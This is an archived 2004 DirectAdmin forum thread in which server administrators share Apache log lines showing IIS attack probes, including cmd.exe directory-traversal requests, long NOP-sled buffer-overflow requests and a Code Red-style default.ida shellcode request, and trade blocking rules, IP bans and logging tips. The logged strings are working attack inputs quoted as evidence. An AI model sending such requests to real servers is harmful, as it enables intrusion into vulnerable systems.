x90\x90\ [Archive] - DirectAdmin Forums

View Full Version : x90\x90\

ret

07-01-2004, 01:17 AM

my access log contains x90\x90\

whats that again? Log file full? Or attemtps to being hacked?

2.3M access_log
2.9M access_log.1
34M access_log.2
39M access_log.3
55M access_log.4

jlasman

07-01-2004, 01:31 AM

Just x90\x90\ on a line of it's own?

Can you please show us an example in context?

Thanks.

Jeff

ret

07-01-2004, 01:41 AM

81.241.202.87 - - [29/Jun/2004:21:34:51 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:53 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:55 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:56 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:58 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:34:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:35:03 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
81.241.202.87 - - [29/Jun/2004:21:35:04 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"

trying to find windwos exploits or so?
this is my log file filled with
90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" 414 271 "-" "-"
61.220.98.26 - - [30/Jun/2004:20:27:00 +0200] "GET /sumthin HTTP/1.0" 404 - "-" "-"
82.49.98.55 - - [01/Jul/2004:07:13:36 +0200] "CONNECT 207.46.133.140:21 HTTP/1.0" 403 - "-" "-"
80.109.27.118 - - [01/Jul/2004:09:43:10 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

jlasman

07-01-2004, 01:56 AM

It looks as if they may be attempted windows exploits.

But I'm not sure.

Jeff

ret

07-01-2004, 03:02 AM

81.23xxxx - - [29/Jun/2004:15:32:18 +0200] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\

toml

07-01-2004, 08:00 AM

They are looking for buffer overflows, if you noticed that request is over 32k. I have been getting a bunch of these too lately.

kriak

07-01-2004, 08:36 AM

I have the same logs.

Do you have an idea as how we could not log these ?

ret

07-01-2004, 08:38 AM

i just ban there iprange

ret

07-01-2004, 09:11 AM

got this from another forum:

<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)cmd.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)root.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/x90\/(.*)$ http://www.microsoft.com
</IfModule>

maybe this is a good solution? redirect requests?

kriak

07-01-2004, 09:19 AM

Put that in httpd.conf and it works fine.

It still won't prevent log accumulation.

DirectAdmin Support

07-01-2004, 11:23 AM

Originally posted by ret
got this from another forum:

<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)cmd.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)root.exe(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://www.microsoft.com
RedirectMatch permanent (.*)\/x90\/(.*)$ http://www.microsoft.com
</IfModule>

maybe this is a good solution? redirect requests?

Haha.. too funny. :)

John

jlasman

07-01-2004, 11:43 AM

Originally posted by DirectAdmin Support
Haha.. too funny. :)
I wonder how many people the humor is lost on.

For anyone who can't figure it out, what that does is whenever someone tries a IIS-based vulnerability attack on your server it gets redirected tothe Microsoft website.

As kriak pointed out, it won't help your logs any, and it does impact Microsoft to some minor extent.Under US law and under Washington law, redirecting to Microsoft could be illegal, and might even be a criminal act.

Jeff

sander815

07-01-2004, 12:57 PM

ok, thanx jeff

toml

07-01-2004, 02:11 PM

You could try:
<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)cmd.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)root.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/x90\/(.*)$ http://127.0.0.1
</IfModule>

kriak

07-01-2004, 04:10 PM

I like the 127.0.0.1 as a solution. With a little luck, it would slow the attacker!

By attacker, I would'nt come to the conclusion of a delibarate hacker attempt : it may also be some kind of worm trying to spread using a known exploit on Win based systems as we see much too often see theses lasts months. That's why I would'nt be too prompt on blocking an IP range solely based on theses logs.

sander815

07-08-2004, 09:56 AM

is this a similar windows exploit?
81.23.206.226 - - [08/Jul/2004:12:29:40 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 - "-" "-"

sander815

07-08-2004, 10:00 AM

Originally posted by toml
You could try:
<IfModule mod_rewrite.c>
RedirectMatch permanent (.*)cmd.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)root.exe(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_vti_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/scripts\/\.\.(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/_mem_bin\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/msadc\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/MSADC\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/c\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/d\/winnt\/(.*)$ http://127.0.0.1
RedirectMatch permanent (.*)\/x90\/(.*)$ http://127.0.0.1
</IfModule>

and where would i add this?

kriak

07-08-2004, 11:09 AM

Originally posted by sander815
is this a similar windows exploit?
81.23.206.226 - - [08/Jul/2004:12:29:40 +0200] "GET /default.ida?... HTTP/1.0" 404 - "-" "-"

It surely is the same kind of exploit (buffer overflow).

Webcart

07-09-2004, 09:34 PM

If you really want to "protect" your logs, you might consider Progressive IP blocking (http://vamos-wentworth.org/bottrap/bottrap.html). I personally don't like an idea of automatic changes of firewall rules like that, but to each his own.

Conditional logging (http://httpd.apache.org/docs/logs.html#conditional) will probably be the easiest thing to go, though.